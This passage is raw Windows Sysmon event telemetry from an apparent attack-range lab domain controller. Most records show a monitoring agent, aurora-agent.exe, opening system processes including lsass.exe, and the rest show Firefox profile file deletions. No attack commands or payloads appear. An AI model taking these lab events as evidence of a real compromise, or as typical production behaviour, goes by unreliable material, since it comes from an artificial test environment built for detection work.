Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.897{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.895{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.803{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.689{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.663{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.661{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.661{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043970Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043969Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043968Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=6ADCE7251DD18891864A2B8AE3660388,SHA256=B042ED6329C9811436DA9EE5B20BB392411042946BFE3F32B782A458FD87FAA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043967Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.515{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=094497235F5A3C0618A4B1E57111645D,SHA256=F711B92323FDB4660E790F46D262B4974E9B31D488BFAF4879A9768EB7018FB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 